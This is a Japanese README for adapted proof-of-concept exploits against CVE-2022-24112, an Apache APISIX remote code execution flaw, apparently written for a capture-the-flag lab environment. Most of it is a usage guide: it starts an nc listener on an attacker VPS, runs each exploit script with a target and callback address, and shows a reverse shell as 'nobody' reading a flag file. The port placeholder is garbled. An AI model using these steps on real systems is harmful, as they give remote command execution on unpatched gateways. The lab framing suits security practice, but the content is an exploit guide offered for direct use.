
CVE-2022-24112_POC
収集したPOC
春秋云境:CVE-2022-24112のターゲット環境を実現するために、2つのPOCを修正しました。M4xSecとtwseptianの両氏のPOCを少し変更し、春秋云境のターゲットに適応させました:
春秋云境:CVE-2022-24112:
Apache APISIXは、Apache Software Foundationが開発したクラウドネイティブなマイクロサービスAPIゲートウェイサービスです。このソフトウェアはOpenRestyとetcdをベースにしており、動的なルーティングとプラグインのホットリロードを備え、マイクロサービスアーキテクチャにおけるAPI管理に適しています。Apache APISIXには、リモートコード実行の脆弱性が存在します。この脆弱性は、製品のbatch-requestsプラグインがユーザーのバッチリクエストを適切に制限しなかったことに起因します。攻撃者はこの脆弱性を悪用してAdmin APIのIP制限を回避し、リモートコード実行につなげることができます。
元のPOC:
1、M4xSec:https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py
2、twseptian:https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py
修正されたPOCは上記の2つで、それぞれLinuxとWindowsの使用環境向けです:
CVE-2022-24112_Linux_by_twseptian.py
VPSでリスナーを起動:nc -lvvp 18888
POCディレクトリに移動して実行:
注意:ここで-tにデータを追加する際、http://やhttps://を記述する必要はなく、ドメイン名+ポートのみで十分です。例:
python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
VPSに戻って状況を確認すると次のようになります:
[root@root ~]# nc -lvvp 18888
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::18888
Ncat: Listening on 0.0.0.0:18888
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x:x.
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
cat /flag
flag{0834f79f-5f40-4389-bce7-c64e969734c4}
CVE-2022-24112_Windows_by_M4xSec.py
VPSでリスナーを起動:nc -lvvp 18888
POCディレクトリに移動して実行:
注意:ここで-tにデータを追加する際、http://やhttps://を記述する必要はなく、ドメイン名+ポートのみで十分です。例:
python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
VPSに戻って状況を確認すると次のようになります:
[root@root ~]# nc -lvvp 18888
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::18888
Ncat: Listening on 0.0.0.0:18888
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x:x.
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
cat /flag
flag{0834f79f-5f40-4389-bce7-c64e969734c4}